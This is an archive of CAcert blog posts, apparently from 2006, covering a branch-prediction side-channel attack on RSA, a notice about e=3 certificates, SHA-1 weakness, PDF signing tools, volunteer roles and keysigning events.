Author Archives: Sourcerer

A New Vulnerability In RSA Cryptography

A new vulnerability associated with RSA cryptography has been found, which works by spying the CPU internals with a spy program running on the same computer as the crypto application. Dedicated systems (like CAcert´s certificate generation) are not affected, only multi-tasking and multi-user systems are affected.

A New Vulnerability In RSA Cryptography

   Posted by kdawson on Saturday November 18, @04:45PM
   from the predictions-of-trouble dept.

   romiz writes, “Branch Prediction Analysis is a recent attack vector
   against RSA public-key cryptography on personal computers that relies
   on timing measurements to get information on the bits in the private
   key. However, the method is not very practical because it requires
   many attempts to obtain meaningful information, and the current
   OpenSSL implementation now includes protections against those attacks.
   However, German cryptographer Jean-Pierre Seifert has announced [1]a
   new method called Simple Branch Prediction Analysis that is at the
   same time much more efficient that the previous ones, only needs a
   single attempt, successfully bypasses the OpenSSL protections, and
   should prove harder to avoid without a very large execution penalty.”
   From the article: “The successful extraction of almost all secret key
   bits by our SBPA attack against an openSSL RSA implementation proves
   that the often recommended blinding or so called randomization
   techniques to protect RSA against side-channel attacks are, in the
   context of SBPA attacks, totally useless.” [2]Le Monde interviewed
   Seifert (in French, but Babelfish works well) and claims that the
   details of the SBPA attack are being withheld; however, a PDF of the
   paper is linked from the [3]ePrint abstract.


Signing PDF documents

We would like to announce the availability of free PDF signature applications:
PortableSigner from is a nice application with a GUI.
CAcert PDF Signer is an older, commandline only application.
Both applications are running on Java, and use the iText library, and should work on Linux, MacOSX and Windows.

New Jobs at CAcert

Due to the growing demand, CAcert is currently growing it´s organisation structure to better handle the work. We decided to enable people to become product managers for the various products we have, and to create a couple of positions for officers dedicated to specific topics/tasks.

The available positions for Product Managers are:
Timestamping, OpenPGP signatures, X.509 certificates, Jabber certificates, Assurance System, Organisation Assurance, Revocation (OCSP+CRL), Digital Signatures, Electronic Invoices, SmartCards

The available areas for Officers:
Security Officer, System administration, Software Officer, Standardisation Officer, Human Ressources, Quality Officer, Public Relations Officer

If you are interested to help CAcert in any of the mentioned fields, please read about the details at and contact us.

Thanks for all your help!

Security notice: e=3 certificates

1. A recent cryptography paper has announced a threat to
RSA certificates where those certificates use a particular
form (known as e=3 for crypto reasons).


2. CACert formed a task force to deal with this issue,
and searched all certs that we issued. We discovered:

a. 414 user certs have this characteristic of e=3.
b. No root or intermediate certs have e=3.

3. We will write to all users with these certs and advise
them to revoke and re-issue.

4. At this stage, we believe the threat of attack to be
low. For this reason we have decided to not revoke the
certificates preemptively.

5. However, if:

a. you are using the certificate for high value purposes,
b. you are in an environment where you may expect to be
attacked aggressively,
c. your software or the software of your users is not
kept up to date nor patched
d. there is a potential attack involving tricking a user
with a bogus RSA signature,

then you may be more at risk. If you think so, we suggest
you revoke the current certificate if e=3, and re-issue
using the normal CAcert website processes.

6. The CAcert risk team is watching the situation and may
choose at some stage to revoke those certificates preemptively.

7. We expect other CAs to take similar steps. This is an
industry wide security situation, and many companies are
evaluating the fallout from the announced weakness.

8. The software packages that are known to be affected to day are:
OpenSSL < 0.9.8c, Firefox <, Opera < 9.02, Netscape, More references:

CAcert in Frankfurt am Main

Am 01.11.2006 gibt es in unserer LUG eine Keysigningparty, wo unter anderem auch CAcert-Assurer vor Ort sein werden.

Sie findet ab 19:00 Uhr am Schönhof, im Restaurant Dionysos, Rödelheimer Str. 34 B, Tel. 069-70 36 89 statt.

CAcert auf der SYSTEMS 2006 in München

CAcert ist auf der SYSTEMS auf dem Stand A3.542 vertreten.

Weitere Infos:

CAcert at PhreakNIC 10

There is a conference in Nashville TN, USA on October 20 and 21. At least one assurer will be there. There is a fee for the conference, but not for the vendors area where an asurrer should be available. Ask at the NLUG booth if more information is needed. Bring your appropraite IDs and be pre-registered with CAcert.

PhreakNIC 10

Days Inn At the Stadium/Downtown
211 N. First St.
Nashville, Tennessee 37213
United States
Toll Free 1-800-251-3038

CAcert and RegisteredCommons at the Wizards of OS 4 in Berlin

RegisteredCommons is a new web-service aimed to provide a secure and trusted registry of audio, video, picture and text works. It will be launched at the 4th Wizards of OS Conference in Berlin together with Lawrence Lessig, co-founder of Creative Commons. RegisteredCommons will be using CAcert certificates for authenticating authors.
CAcert Assurance will be offered at the Wizards of OS conference in Berlin.

OWASP Autumn Of Code 2006

The OWASP (Open Web Application Security) project starts a Autumn of Code campaign to make the web more secure.

SHA1 getting insecure : WinXP-SP2, Debian Stable, FreeBSD 6.1, OSX 10.4 affected!

SHA-1 has just been broken a bit more:
CAcert is aggressively moving to SHA-2 as we speak.

Microsoft will support SHA-2 only in Windows Vista according to our sources.
Debian Stable, FreeBSD and OSX don´t provide SHA-2 in their current versions.
SuSE, Knoppix, FC5, Ubuntu, Mandriva, … all support SHA-2 already.
Read more details about SHA-2 support of various applications and distributions on

Please contact your vendor to tell them that you need SHA-2 support!